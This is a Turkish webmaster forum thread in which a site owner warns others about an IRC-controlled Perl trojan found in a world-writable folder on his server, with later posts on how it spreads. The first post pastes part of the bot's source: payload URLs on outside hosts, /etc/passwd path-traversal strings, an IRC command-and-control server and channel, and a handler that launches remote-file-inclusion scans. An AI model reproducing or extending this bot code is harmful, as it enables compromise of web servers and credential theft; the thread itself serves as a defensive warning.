![]() |
|
|||||||
| Webmaster Genel Konular Webmaster Genel Konular |
![]() |
|
|
LinkBack (1) | Seçenekler | Stil |
|
||||
|
Selam,
Sitemin biri için "RSA Anti-Fraud Command Center (afcc@rsasecurity.com)" adresinden bir mail gelmiş geçen gün. Mailde sitemin birinde bilgim dışında biri trojan scan ettiriyormuş. (Adresi vermeyeceğim güvenlik açısından.) Bu virüs, sitemin chmodu 777 olan bir klasöre bir şekilde bulaştırılmış, perl ve php kodlarıyla yazılmış IRC üzerinden yönetilen bir oto-scan trojan/virüstür. RSA nın belirttiği dosyanın bulunduğu klasöre baktığımda 10-20 arası dosya bulunmaktaydı. Silmeye çalıştığımda ise, bir kaçı silinmedi. Silinmeyen dosyaların birinin içinde; Kod:
#################
#[Configuration]#
#################
my $response = "http://www.zinforma.com/arab.txt"; # included in zip as response.txt
my $test = "http://need-this.info/pretty/234/control/id2.txt"; # included in zip as test.txt
my $printcmd = "-=Hidup Hanya Sebuah Ilusi=-";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "http://www.teste.dark-hosting.be/mohaa/echo.txt";
my $nickname = "TDO^Scan".(int(rand(999)));
my $ident = "racrew";
my $channel = "#tondano";
my $server = "irc.racrew.us";
my $port = 6667;
#################
#[Configuration]#
#################
my $sock;
my $exploitcounter = 100;
my @User_Agent = &Agent();
my $pid = fork();
if($pid==0){
&connectirc($nickname,$ident,$channel,$server,$port);
}else{
exit(0);
}
sub connectirc(){
my($nickname,$ident,$channel,$server,$port)=@_;
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server",PeerPort=>$port);
$sock->autoflush(1);
print $sock "NICK ".$nickname."\r\n";
print $sock "USER ".$ident." 8 * : r@cRew \r\n";
print $sock "JOIN ".$channel."\r\n";
while( $command = <$sock> ){
if($command =~ /\!rfi\s+(.*?)\s+(.*)/){
if(fork() == 0){
my($bug,$dork)=($1,$2);
&scan($bug,$dork);
exit(0);
}
}
Sunucuya girip nelerin olup bittiğine bakabilirsiniz. Sunucularınızdaki güvenliği arttırmanız tavsiye edilir. Bu arada trojanı bhlynx script yardımıyla çoğaltıyorlar sanırım. ![]()
__________________
reseller |
|
||||
|
Bu arada biraz gözlem yaptımda,
sistem çok gelişmiş. Google'dan aşağıdaki aramayı yaparak açığı olanlara otomatikmen bulaşıyor. Alıntı:
![]()
__________________
reseller |
|
||||
|
Ayrıyetten, bu virüsü yayan kişi, paypal hesaplarınızı çalabiliyor, httpdflood, udpflood, tcpflood, portscan türü şeylerde yapabiliyor.
Virüsü yayan kişinin mail adresini buldum sanırım.
__________________
reseller |
![]() |
LinkBacks (?)
LinkBack to this Thread: http://forum.iyinet.com/webmaster-genel-konular/90480-dikkat-farkli-bir-trojan.html
|
||||
| Konuyu Başlatan | For | Type | Tarih | |
| Dikkat, farkl? bir TROJAN! | This thread | Refback | 2008-05-25 18:47 | |
| Seçenekler | |
| Stil | |
|
|
Benzer Konular
|
||||
| Konu | Konuyu Başlatan | Forum | Cevaplar | Son Mesaj |
| Tema Explorerde Farklı Firefoxda Farklı | Linux | WordPress | 5 | 2008-03-23 15:20 |
| Yeni YouTube(sitesi) virüsüne dikkat! [Trojan-Dropper.W32/Agent.CPL] | Mywedding | Virus Spyware Spam | 1 | 2007-11-14 20:27 |
| Aynı site-aranan kelime farklı-cacheler farklı | riseofthemachines | Google Arama | 0 | 2007-03-01 07:45 |